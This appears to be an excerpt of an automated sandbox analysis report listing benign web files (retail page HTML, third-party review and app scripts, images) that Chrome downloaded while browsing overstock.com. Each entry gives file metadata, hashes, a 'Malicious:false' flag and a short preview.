                                                                                                                                                                                    Preview:RIFFrH..WEBPVP8 fH..PH...*....>1..C"!!.,]. .....'s........6...=:.....VB..ky...U..w.7..(.Y...'.O.z.o. ../2.c.v.....#.'E.{..r?...Q.^v.k..q@.L......?.,~........[.3....Z...~.~.{.z..E....._.w.?l...x................5.g....g....l....:W..........?...............Y.3.............).W.w..._..r........._........W.W.w.~....I......m...7.?h.z..z..........._.c.........?.......'...O......v.....O.........1.......?...............?............/.o................W.........j..........e..S.7.>.>..9.U.p.F=A'..m....=.o/.m..\`0+.....p.t'....2...[.<...hh......Y..._.:..R..I..w.7..@/t...1.P...Z.........z...sW........S>.PO.a......u.......8/...!..x..D.<.K..!..A.'v..%....O.M...3.~{h..:U....../...&v};..f.[o-.k..H? L.&. ...IL..V.gf.n..*...pm....lNi3C..&^}.Ez.....h...`.....}..ur....yJ...^.[t.:....2.I.......;8|..1 .RX.|....]lC.....O..~.J..]........B..kl...I5(._......{.W....C......b39.w......?.0On...Q....8...|.....1....A-P..z..}..0..3~.s..#...^c.M`5.d..M.......,.4....H.M
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (32461)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):69246
                                                                                                                                                                                    Entropy (8bit):5.499115539817298
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:1536:d2fwG1e7F2fy+WdsnMat95WnKFN0mI5KhvyEpH8dInSQu4cSStUkk0og0t:d2fIRZ+WOnZj5WnKFNY5KJpHNSQgWkk1
                                                                                                                                                                                    MD5:C8CE6A273CD1FD679985F0CFE1F63170
                                                                                                                                                                                    SHA1:066BE33802F4697A29C3A49DAD1A81785D8514A5
                                                                                                                                                                                    SHA-256:D83B7F084326A698DEC02C1131ECDB4E0D8432342AC8E4AC043A1BC80F5B1DA0
                                                                                                                                                                                    SHA-512:0BCDAC57F62C425D054CCA1D1C2459B0DC2C5548F8B6B26AD871B679A65A1FC7B302A61C181C977DA10223BB408E805FF82B362D503C16714DBFFFAFD3C4B2DA
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cdn.tapcart.com/webbridge-sdk/webbridge.umd.js?shop=a37a28-2.myshopify.com
                                                                                                                                                                                    Preview:/**. * name: @tapcart/webbridge. * version: v1.10.0. * description: Tapcart WebBridge SDK. * homepage: https://github.com/tapcartinc/tapcart-webbridge. */.(function(){"use strict";try{if(typeof document<"u"){var e=document.createElement("style");e.appendChild(document.createTextNode(".tapcart-webbridge #tapcart-web-banner{display:none!important}.tapcart-webbridge footer,.tapcart-webbridge header,.tapcart-webbridge #footer,.tapcart-webbridge #header{display:none}.tapcart-webbridge iframe{display:none}")),document.head.appendChild(e)}}catch(t){console.error("vite-plugin-css-injected-by-js",t)}})();.(function(ae){typeof define=="function"&&define.amd?define(ae):ae()})(function(){"use strict";const ae=t=>t&&Object.keys(t).length===0&&t.constructor===Object;function rn(t){const e={};if(!Array.isArray(t))return e;for(const r of t)r&&r.name&&r.enabled&&(e[r.name]=r);return e}const nn=t=>{if(!t)return{};const e=n=>Array.isArray(n)?n.reduce((a,{namespace:s,key:i,value:o})=>(a[s]?a[s][i]=o:a[s]=
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (12701)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):13363
                                                                                                                                                                                    Entropy (8bit):5.38931773767702
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:384:b5bYu28BX+l4qMufAlXBmdWbDJyGdUpCpZv:bhY7KvedAnZv
                                                                                                                                                                                    MD5:15DE19F42B35806FAF815298644157E0
                                                                                                                                                                                    SHA1:62315E4A2013AAEC6AF762D71FCC800136494628
                                                                                                                                                                                    SHA-256:7F06DEF529E0076B37F65C60085A6B1C65F1BBAB0B1F87C72C188018B5094966
                                                                                                                                                                                    SHA-512:6506BA8B6465070FEAA86BE8803F53825B9A9922D394043CC7052CD6FBEA9548C343E6EEC7137C5D3A5BA80C11A1B02C6C6B442AE59DA3D48DEC14602062B2DB
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://ds-aksb-a.akamaihd.net/aksb.min.js
                                                                                                                                                                                    Preview:/*.Copyright 2010 Google Inc..Copyright 2016 Akamai Technolgies..Licensed under the Apache License, Version 2.0 (the "License");.you may not use this file except in compliance with the License..You may obtain a copy of the License at.. http://www.apache.org/licenses/LICENSE-2.0..Unless required by applicable law or agreed to in writing, software.distributed under the License is distributed on an "AS IS" BASIS,.WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied..See the License for the specific language governing permissions and.limitations under the License...See the source code here:. http://code.google.com/p/episodes/.*/...!function(){function e(e,s){function u(){this.data={},this.value=[]}function d(e,t){for(var n={},r=s.getElementsByTagName(t),o=0;o<r.length;o++)e.href=r[o].src||r[o].href,e.href.match(/^https?:\/\//)&&(n[e.href]=r[o]);return n}function p(e,t){if(e&&e.hasAttribute("rel"))for(var n=e.rel.split(/[\u0009\u000A\u000C\u000D\u0020]+/),r=0;r<n.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (12875), with no line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):12875
                                                                                                                                                                                    Entropy (8bit):5.229604496973644
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:YNQ6j5r9VBR0fUjk9Y9jnGhNPlIU628IubH6DezHkeqr17ctOo4o+KQCYqKEI0SQ:MjzQnnerg0XJrq67AcYeXVivod
                                                                                                                                                                                    MD5:F34D38C90923A3CF0A95695C11A3169B
                                                                                                                                                                                    SHA1:EDCCC3165018181940C8F5C509B596AE1F5BC635
                                                                                                                                                                                    SHA-256:EFF2497F10D71BBCD02C4372EFD22F3C7D74ED699A57073CCF912BD23CECACF4
                                                                                                                                                                                    SHA-512:EDFC5F14B2E266904E17841ED0BAE77E693DFC9CBDB2678718EB9FB166D6D6B49AF30134B925D0050F770730A2925F7CBC14096BF5B4F40262B10B46FD235CC8
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:!function(){var e=function(e){var t={exports:{}};return e.call(t.exports,t,t.exports),t.exports},t=function(){function e(e,t){var r=[],o=!0,a=!1,n=void 0;try{for(var i,s=e[Symbol.iterator]();!(o=(i=s.next()).done)&&(r.push(i.value),!t||r.length!==t);o=!0);}catch(e){a=!0,n=e}finally{try{!o&&s.return&&s.return()}finally{if(a)throw n}}return r}return function(t,r){if(Array.isArray(t))return t;if(Symbol.iterator in Object(t))return e(t,r);throw new TypeError("Invalid attempt to destructure non-iterable instance")}}(),r=function(e){return e&&e.__esModule?e:{default:e}},o=function(e){if(Array.isArray(e)){for(var t=0,r=Array(e.length);t<e.length;t++)r[t]=e[t];return r}return Array.from(e)},a=e((function(e,t){"use strict";function r(e){"loading"!==document.readyState?e():document.addEventListener?document.addEventListener("DOMContentLoaded",e):document.attachEvent("onreadystatechange",(function(){"loading"!==document.readyState&&e()}))}Object.defineProperty(t,"__esModule",{value:!0}),t.default
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (58819)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):2634984
                                                                                                                                                                                    Entropy (8bit):5.305866176779404
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24576:Bk4+ZNoE0ehD2vByjVEJYJGrZ9RlyMkI2c+OC5yXJSMg4uz8ScBoRqw+YGK2L3KY:BV+csUBYLFr1+Vz
                                                                                                                                                                                    MD5:E36A2B5A5C78DA79496D895C31306E72
                                                                                                                                                                                    SHA1:2B010C11F6EA786BB6A8660E0F7D50F354E36EA8
                                                                                                                                                                                    SHA-256:AE497B571FC69BFDE2CFF878712F8C431D78B427B95850149D0103A91D28FB00
                                                                                                                                                                                    SHA-512:1E67346C901756B5E678A8A9D47E74BF7526BD78FE4E6DB6CC360FAEAC03D8443D813D2CCDF88FDB1AD3A9D8867FB13A58B83922E0B1D4F3F71F5D4FB0C86C26
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/collections/kitchen-lighting
                                                                                                                                                                                    Preview:<!doctype html>.<html class="no-js" lang="en" dir="ltr">.<head>. <script>. if (!window.DOMAINE) window.DOMAINE = {};. window.DOMAINE.technical = {. apiVersion: "2024-07",. storefrontToken: "72e5b536982e2714efe8f8314d50d8f3",. shopName: "a37a28-2.myshopify.com",. localization: {. countryCode: "US",. currencyCode: "USD". }. };.</script>.. <script>. const _url = new URL("https://www.overstock.com/collections/kitchen-lighting").. if (_url.host === 'a37a28-2.myshopify.com' || _url.host === 'checkout.overstock.com') {. _url.host = 'www.overstock.com';. window.location = _url.toString();. }.. if (_url.pathname === '/account/login') {. const loginURL = new URL('?redirect_to=https%3A%2F%2Fwww.overstock.com%2F', 'https://login.overstock.com');. window.location = loginURL.toString();. }. . const query = new URLSearchParams(window.location.search).get('q')?.toLowerCase();. const path = window.location.pathname;.. if (path
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 640x238, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):8944
                                                                                                                                                                                    Entropy (8bit):7.9775430146353115
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:yqIoktfIf7zXNWIjSw7P9L6bncwHS1Pk3Jhv5hSEju7ryfLGtP:yPoktwfFWjw7Pobn3HS1PS9S1qLG1
                                                                                                                                                                                    MD5:9333715BB5161F2DBA59D12D491E329A
                                                                                                                                                                                    SHA1:EBF7FB8F1D124B9F24E7A613DA31D730F902D69E
                                                                                                                                                                                    SHA-256:A423403800D697E207B81E8B3119C3DD0CC98EBDFD1FF4C2D67213CD90FC64B6
                                                                                                                                                                                    SHA-512:B17B82CD41E188217851CE438F723C00818D14256544FB056BEDAA02951BB98A6322817A5B56DBD302D5A784986AD29C05D12BD228AD43AD718056F63A3BB27F
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://ak1.ostkcdn.com/img/mxc/10142024_Domestic_Bento1.jpg?imwidth=640
                                                                                                                                                                                    Preview:RIFF."..WEBPVP8 .".......*....?.~.T.(:...:.P".M..).{...+.o.u.....o.7...=}...[...K.q.ii...V.....|...W.W.&....)..)....P.M.......]&.t2...)..m*.^.d...V5.....X..8M.....Z.9t......4$...%'<.....imzTw..2;..-[}.../.......?....Q_....>^...%&. Z....G.Ao.._a....*R..-nnBQ&'}.~`{P...|[.7....a..XH......-..k6d...M=.,.=.^.l.?..M.}.kI.j...K..N....Q...$|....r.O...t.QPC.G3.1.<~.zL......fb.....X.^ .KCb.]0K..3.r 9.u.....m!...Si.f.....4z.U....%....,=....Z.t%.]49F...V.7.+.E.#C..@S.../.!.....R6sd..Q...<....Q......r.n.#.M|.....&8. .~5......aZy.u...d0<....a'd....).=.p[.c.].?......$q_.m.....+.c..*.$..3V...^?....W.....=.........Q]^A....:m..e.. ....3......Ip..t......c2....d.....Y...q^<....U#..>...X.+k-A....i.l.H..]#?b...v.>[]4......L~`......:...f...z.T.....*.."A60.....*`.g....mO.>........^._K...........`....".....n.|F.1.....z.. ,k....x.....).... ..3...tv.....l....y.IF..2....x.{b..*SX3......o<LT...!...Kc$......#Q..T.I.-.8.?..l..o....V...W.V.N.d%.......w.r.1U"4nT.....+.jNz
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (58819)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):2653437
                                                                                                                                                                                    Entropy (8bit):5.309016882990816
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24576:JbL+TNoE0ehD2vByjVEJYJGrZ9RlyMkI2c+OC5yXJSMg4uz8ScBoRqw+YGK2L3KY:J3+CsUBYLFr1+Vz
                                                                                                                                                                                    MD5:E7B4758F0E76F455BB03828C3D7D6587
                                                                                                                                                                                    SHA1:E007B9C888EF5C593CFE8CFEDFF8F4D5C23F6766
                                                                                                                                                                                    SHA-256:D5331AA8A6B6CF8BF59D30A89DE67C5E8A611F97A89571A8E63E8E7ED82FC435
                                                                                                                                                                                    SHA-512:104F6C6A69CDFC1C49DC16B1231FFCCF6EE99A8911510FCD56973C49E4FBF26943A621A2F7DCC2C4D14C7E14AC3A59D423378A2FD5DDDDC01E8C85453B7A32AE
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/collections/outdoor-storage
                                                                                                                                                                                    Preview:<!doctype html>.<html class="no-js" lang="en" dir="ltr">.<head>. <script>. if (!window.DOMAINE) window.DOMAINE = {};. window.DOMAINE.technical = {. apiVersion: "2024-07",. storefrontToken: "72e5b536982e2714efe8f8314d50d8f3",. shopName: "a37a28-2.myshopify.com",. localization: {. countryCode: "US",. currencyCode: "USD". }. };.</script>.. <script>. const _url = new URL("https://www.overstock.com/collections/outdoor-storage").. if (_url.host === 'a37a28-2.myshopify.com' || _url.host === 'checkout.overstock.com') {. _url.host = 'www.overstock.com';. window.location = _url.toString();. }.. if (_url.pathname === '/account/login') {. const loginURL = new URL('?redirect_to=https%3A%2F%2Fwww.overstock.com%2F', 'https://login.overstock.com');. window.location = loginURL.toString();. }. . const query = new URLSearchParams(window.location.search).get('q')?.toLowerCase();. const path = window.location.pathname;.. if (path
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (38868), with LF, NEL line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):239533
                                                                                                                                                                                    Entropy (8bit):5.35897836836547
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3072:Q4DLZ59p9gl3Mh++mwSZmB0+fUd5MNaBTT2Wsg6:Q4DLjCl3j+mFpkUhTy5
                                                                                                                                                                                    MD5:F9483F0A62CDC235C3C68BF346E73063
                                                                                                                                                                                    SHA1:95C05F4D2DA9DFCC2D16E62E71EEECE1314D5E9F
                                                                                                                                                                                    SHA-256:415549AB1F904263D123E643E2450C3C34BE866D325E20DFD72D82EBD18CD773
                                                                                                                                                                                    SHA-512:535D4E18983E56AC1F0AE491B9FAC49914C0011899B57F63BB470007AF6671CDD65CB095EF1C10CA5528F9AF1FC403ED4657E390012B44BEC4D5786A7DDD603A
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://ui.powerreviews.com/tag-builds/10461/4.1/js/chunks/8.js
                                                                                                                                                                                    Preview:/*!. * PowerReviews, Copyright 2024. * Build: 10461 | a4644180a | 10/3/2024. */.(self.pwrClg=self.pwrClg||[]).push([[8],{36984:(e,t)=>{"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.BLANK_URL=t.relativeFirstCharacters=t.whitespaceEscapeCharsRegex=t.urlSchemeRegex=t.ctrlCharactersRegex=t.htmlCtrlEntityRegex=t.htmlEntitiesRegex=t.invalidProtocolRegex=void 0,t.invalidProtocolRegex=/^([^\w]*)(javascript|data|vbscript)/im,t.htmlEntitiesRegex=/&#(\w+)(^\w|;)?/g,t.htmlCtrlEntityRegex=/&(newline|tab);/gi,t.ctrlCharactersRegex=/[\u0000-\u001F\u007F-\u009F\u2000-\u200D\uFEFF]/gim,t.urlSchemeRegex=/^.+(:|&colon;)/gim,t.whitespaceEscapeCharsRegex=/(\\|%5[cC])((%(6[eE]|72|74))|[nrt])/g,t.relativeFirstCharacters=[".","/"],t.BLANK_URL="about:blank"},48068:(e,t,r)=>{"use strict";t.o=void 0;var n=r(36984);function o(e){try{return decodeURIComponent(e)}catch(t){return e}}t.o=function(e){if(!e)return n.BLANK_URL;var t,r,a=o(e);do{t=(a=o(a=(r=a,r.replace(n.ctrlCharactersRegex,"").replace(
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (1020)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1116
                                                                                                                                                                                    Entropy (8bit):5.044628553595581
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:WWToeeTpUhVanMTdDAWd47Mdt7RedKpJMdN+uBde/lBIP9caP9TP9mLP9eXPlEGd:RJj+jmVjDBIaaVSIEGVdoxNHG
                                                                                                                                                                                    MD5:D486CEF1DBA3AB37799876AC6893A894
                                                                                                                                                                                    SHA1:CDE098463187F72942EDBE19B3BFD9EDC76E1F1B
                                                                                                                                                                                    SHA-256:C858F81C53789910730F476CABAAD798AB3162203A9AEB227BAE8E858C511E41
                                                                                                                                                                                    SHA-512:3F09498F4FAD36B4CA8F7C7B60A43395335BCB34C7E8F566B3372BAFB12199F90AD507684319533A880207824DF6CAAA27130D65E75835D00531F677242FCEA2
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/t/224/assets/count-down.js?v=127991165756241791691730157903
                                                                                                                                                                                    Preview:if(!customElements.get("countdown-product")){class Countdown extends HTMLElement{constructor(){super(),this.endDate=new Date(this.dataset.endDate).getTime(),Number(this.endDate)&&window.initLazyScript(this,this.init.bind(this))}init(){this.daysEl=this.querySelector(".js-days"),this.hoursEl=this.querySelector(".js-hours"),this.minsEl=this.querySelector(".js-mins"),this.secsEl=this.querySelector(".js-secs"),this.second=1e3,this.minute=60*this.second,this.hour=60*this.minute,this.day=24*this.hour,this.timer(),this.interval=setInterval(this.timer.bind(this),this.second)}timer(){const timeDiff=this.endDate-new Date;if(timeDiff<0){clearInterval(this.interval);return}const days=Math.floor(timeDiff/this.day),hours=Math.floor(timeDiff/this.hour),mins=Math.floor(timeDiff/this.minute),secs=Math.floor(timeDiff/this.second);this.daysEl.textContent=days,this.hoursEl.textContent=hours-days*24,this.minsEl.textContent=mins-hours*60,this.secsEl.textContent=secs-mins*60}}customElements.define("countdown-
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 80x80, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):2974
                                                                                                                                                                                    Entropy (8bit):7.310702856792921
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:NBIl/XflVxqtcSlMW9lBnDdFBfvtHQzuIWwgmt266Prl10YJ9axzU/TAE2pVTmt:NBIl/XrxIcSlMuBnB3GzuIWwjUrv0YJn
                                                                                                                                                                                    MD5:F3D88A35FEBB4B597D0FEF9089944514
                                                                                                                                                                                    SHA1:A9E92DC81D59BDA3E7ED483D0EA69B4D7269CC4F
                                                                                                                                                                                    SHA-256:6E5590551BD5E5C9D32D85F4774004493DF30CEFA6FF2CBF8F7800C3DD45F57B
                                                                                                                                                                                    SHA-512:8541B1D3E8125B011B1273FEBC352F4545E42065C2DA7739819AAFF396397C3729D7779F468872706B6A490F4A9F144033FED6893663833B0E674149061377D5
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................P...........P...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......P.P..................................................................................@k...XtN6D.9.........(..B...R.V...p..I..."OM.t..C.....G.,S."h...S.n.`.(.E+O...MeY...].F.#'+R.....}.......j...T....KC.i.8.....R{9..Y..
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):42
                                                                                                                                                                                    Entropy (8bit):2.9881439641616536
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:CUXPQE/xlEy:1QEoy
                                                                                                                                                                                    MD5:D89746888DA2D9510B64A9F031EAECD5
                                                                                                                                                                                    SHA1:D5FCEB6532643D0D84FFE09C40C481ECDF59E15A
                                                                                                                                                                                    SHA-256:EF1955AE757C8B966C83248350331BD3A30F658CED11F387F8EBF05AB3368629
                                                                                                                                                                                    SHA-512:D5DA26B5D496EDB0221DF1A4057A8B0285D15592A8F8DC7016A294DF37ED335F3FDE6A2252962E0DF38B62847F8B771463A0124EF3F84299F262ED9D9D3CEE4C
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:GIF89a.............!.......,...........D.;
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (65444)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):437138
                                                                                                                                                                                    Entropy (8bit):4.96222517648304
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:6144:dPMo0WsOreOtBbiBZc4LveerH7/PfcEWzExKjoNfrQYWRtXk72o4V:dPMo3YwYWRtXk72oG
                                                                                                                                                                                    MD5:BE6A019E0609E3FD5715FD8DFE428C39
                                                                                                                                                                                    SHA1:2A23C8B5406310D076AA25A1DF098B2F658F3066
                                                                                                                                                                                    SHA-256:4E1220C5B994AB293FD025A117221366376A2590399C176033F4A91ED76859F8
                                                                                                                                                                                    SHA-512:97A9FA2EE6C2BF4F2B0ABAB02F79C51C6E04EC3AD772232BD42FA58A58F26878F0A12D92B69CA0A97C62710BF55F1B375731B4FAADEC9FC7722DD64E88766BCC
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://ui.powerreviews.com/tag-builds/10461/4.1/css/styles.css
                                                                                                                                                                                    Preview:/*!. * PowerReviews, Copyright 2024. * Build: 10461 | a4644180a | 10/3/2024. */.@charset "UTF-8";.p-w-r{display:block!important}.p-w-r a,.p-w-r abbr,.p-w-r acronym,.p-w-r address,.p-w-r applet,.p-w-r article,.p-w-r aside,.p-w-r audio,.p-w-r b,.p-w-r big,.p-w-r blockquote,.p-w-r body,.p-w-r canvas,.p-w-r caption,.p-w-r center,.p-w-r cite,.p-w-r code,.p-w-r dd,.p-w-r del,.p-w-r details,.p-w-r dfn,.p-w-r div,.p-w-r dl,.p-w-r dt,.p-w-r em,.p-w-r embed,.p-w-r fieldset,.p-w-r figcaption,.p-w-r figure,.p-w-r footer,.p-w-r form,.p-w-r h1,.p-w-r h2,.p-w-r h3,.p-w-r h4,.p-w-r h5,.p-w-r h6,.p-w-r header,.p-w-r hgroup,.p-w-r html,.p-w-r i,.p-w-r iframe,.p-w-r img,.p-w-r ins,.p-w-r kbd,.p-w-r label,.p-w-r legend,.p-w-r li,.p-w-r mark,.p-w-r menu,.p-w-r nav,.p-w-r object,.p-w-r ol,.p-w-r output,.p-w-r p,.p-w-r pre,.p-w-r q,.p-w-r ruby,.p-w-r s,.p-w-r samp,.p-w-r section,.p-w-r small,.p-w-r span,.p-w-r strike,.p-w-r strong,.p-w-r sub,.p-w-r summary,.p-w-r sup,.p-w-r table,.p-w-r tbody,.p-w-r td,.p-w-
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (58819)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):2619408
                                                                                                                                                                                    Entropy (8bit):5.301600243940269
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24576:0m6+GNoE0ehD2vByjVEJYJGrZ9RlyMkI2c+OC5yXJSMg4uz8ScBoRqw+YGK2L3KY:05+LsUBYLFr1+Vz
                                                                                                                                                                                    MD5:6B955D4C12C229F0016EBD4E4329C0B3
                                                                                                                                                                                    SHA1:A0938BA8CA74775B1E4495A94094E53B12EFF4BE
                                                                                                                                                                                    SHA-256:57466501E27C2DAA56D283AA487E59EE3DAEBADEB4B43CD01F27509DD16212AF
                                                                                                                                                                                    SHA-512:F841FC3E0739B00EA80129D7980B45174275207DE864272BDB8FE9C76EE0E840562F07982880E8B1790CC52E99219F75836CC463A98FA488B3A0B72D850219C2
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/collections/lawn-sprinklers
                                                                                                                                                                                    Preview:<!doctype html>.<html class="no-js" lang="en" dir="ltr">.<head>. <script>. if (!window.DOMAINE) window.DOMAINE = {};. window.DOMAINE.technical = {. apiVersion: "2024-07",. storefrontToken: "72e5b536982e2714efe8f8314d50d8f3",. shopName: "a37a28-2.myshopify.com",. localization: {. countryCode: "US",. currencyCode: "USD". }. };.</script>.. <script>. const _url = new URL("https://www.overstock.com/collections/lawn-sprinklers").. if (_url.host === 'a37a28-2.myshopify.com' || _url.host === 'checkout.overstock.com') {. _url.host = 'www.overstock.com';. window.location = _url.toString();. }.. if (_url.pathname === '/account/login') {. const loginURL = new URL('?redirect_to=https%3A%2F%2Fwww.overstock.com%2F', 'https://login.overstock.com');. window.location = loginURL.toString();. }. . const query = new URLSearchParams(window.location.search).get('q')?.toLowerCase();. const path = window.location.pathname;.. if (path
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:gzip compressed data, from Unix, original size modulo 2^32 115
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):123
                                                                                                                                                                                    Entropy (8bit):6.316339302016844
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:Fttq0zXQjDThZu1bg0lVfroYoQ337LilHFF/:XtP7u/PUbjroc33fYHFN
                                                                                                                                                                                    MD5:3CE4EB772DC3294E0CC49D98708F565D
                                                                                                                                                                                    SHA1:A2171103F663FEAE68E64812C159E2E60CE318F9
                                                                                                                                                                                    SHA-256:227DFA1D3E3FE757FC09C32C117F667C0E3380F4A2E37B55745188B427C418B2
                                                                                                                                                                                    SHA-512:6AEFEA4B982F126C66758EB0F37EE7042E383270924E36138C835ECEDACB055F41BFF4075A5A697FC29E95499208A6F07BAE445F29D75FBB27C9B612D422E414
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:............Q..0....|.6.t...@.Pl..f)IDD...}..N..;..r..e>.u.k.].e.....UE!...J....5yc..={.o.*....0.V..l6.1......?N.kYs...
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (58819)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):2590544
                                                                                                                                                                                    Entropy (8bit):5.29116331144833
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24576:DDX+XNoE0ehD2vByjVEJYJGrZ9RlyMkI2c+OC5yXJSMg4uz8ScBoRqw+YGK2L3KY:D7+WsUBYLFr1+Vz
                                                                                                                                                                                    MD5:262FF5D59B2F38255B056A6022FE8E08
                                                                                                                                                                                    SHA1:E3F20A8551283F07A15116ADDD20D881FCD070B8
                                                                                                                                                                                    SHA-256:F4B3B5CC972A2D5DC0277AD097BB40017EFAF4193B6AF5A7DA1E137CA80E9B71
                                                                                                                                                                                    SHA-512:6D680163B7C5FA90207BB7B24F1176428196D993DF3BF08ECCC45E7068D59FC4AE39E304C04A2D8DF303C4958C7FFF9F69B99D6169B3251F82C3880E4995992D
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/collections
                                                                                                                                                                                    Preview:<!doctype html>.<html class="no-js" lang="en" dir="ltr">.<head>. <script>. if (!window.DOMAINE) window.DOMAINE = {};. window.DOMAINE.technical = {. apiVersion: "2024-07",. storefrontToken: "72e5b536982e2714efe8f8314d50d8f3",. shopName: "a37a28-2.myshopify.com",. localization: {. countryCode: "US",. currencyCode: "USD". }. };.</script>.. <script>. const _url = new URL("https://www.overstock.com/collections").. if (_url.host === 'a37a28-2.myshopify.com' || _url.host === 'checkout.overstock.com') {. _url.host = 'www.overstock.com';. window.location = _url.toString();. }.. if (_url.pathname === '/account/login') {. const loginURL = new URL('?redirect_to=https%3A%2F%2Fwww.overstock.com%2F', 'https://login.overstock.com');. window.location = loginURL.toString();. }. . const query = new URLSearchParams(window.location.search).get('q')?.toLowerCase();. const path = window.location.pathname;.. if (path === '/search' &&
